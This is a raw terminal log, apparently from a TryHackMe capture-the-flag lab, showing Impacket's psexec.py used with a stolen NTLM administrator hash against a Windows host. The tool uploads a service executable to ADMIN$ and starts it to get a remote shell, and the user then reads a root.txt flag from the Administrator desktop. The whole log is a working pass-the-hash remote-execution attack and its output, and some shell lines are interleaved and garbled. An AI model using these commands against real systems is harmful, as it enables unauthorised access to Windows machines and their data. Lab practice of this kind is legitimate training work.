┌──(impacketEnv)─(bluejay820㉿kali)-[~/Documents/kali-files/THM]
└─$ python3 /home/bluejay820/Documents/software/impacket/impacketEnv/bin/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:3f3ef89114fb063e3d7fc23c20f65568 Administrator@10.10.208.220
Impacket v0.10.1.dev1+20220606.123812.ac35841 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.10.208.220.....
[*] Found writable share ADMIN$
[*] Uploading file MaVTQaUL.exe
[*] Opening SVCManager on 10.10.208.220.....
[*] Creating service HtQe on 10.10.208.220.....
[*] Starting service HtQe.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> cd ..
d 
.C:\Windows> .

cdC:\>  Documents
The system cannot find the path specified.

C:\> cd Users

C:\Users> cd Administrator

C:\Users\Administrator> dir
 Volume in drive C has no label.
 Volume Serial Number is E220-3D5E

 Directory of C:\Users\Administrator

10/07/2020  05:10 PM    <DIR>          .
10/07/2020  05:10 PM    <DIR>          ..
09/16/2020  04:52 PM    <DIR>          3D Objects
09/16/2020  04:52 PM    <DIR>          Contacts
10/07/2020  05:13 PM    <DIR>          Desktop
09/16/2020  04:52 PM    <DIR>          Documents
09/16/2020  04:52 PM    <DIR>          Downloads
09/16/2020  04:52 PM    <DIR>          Favorites
09/16/2020  04:52 PM    <DIR>          Links
09/16/2020  04:52 PM    <DIR>          Music
09/16/2020  04:52 PM    <DIR>          Pictures
09/16/2020  04:52 PM    <DIR>          Saved Games
09/16/2020  04:52 PM    <DIR>          Searches
09/16/2020  04:52 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  52,329,902,080 bytes free

C:\Users\Administrator> cd Desktop

dC:\Users\Administrator\Desktop> ir
 Volume in drive C has no label.
 Volume Serial Number is E220-3D5E

 Directory of C:\Users\Administrator\Desktop

10/07/2020  05:13 PM    <DIR>          .
10/07/2020  05:13 PM    <DIR>          ..
09/20/2020  02:02 PM                24 root.txt
               1 File(s)             24 bytes
               2 Dir(s)  52,329,902,080 bytes free

C:\Users\Administrator\Desktop> more root.txt
THM{Zer0Log0nD4rkTh1rty}

C:\Users\Administrator\Desktop> exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on 10.10.208.220.....
[*] Stopping service HtQe.....
[*] Removing service HtQe.....
[*] Removing file MaVTQaUL.exe.....

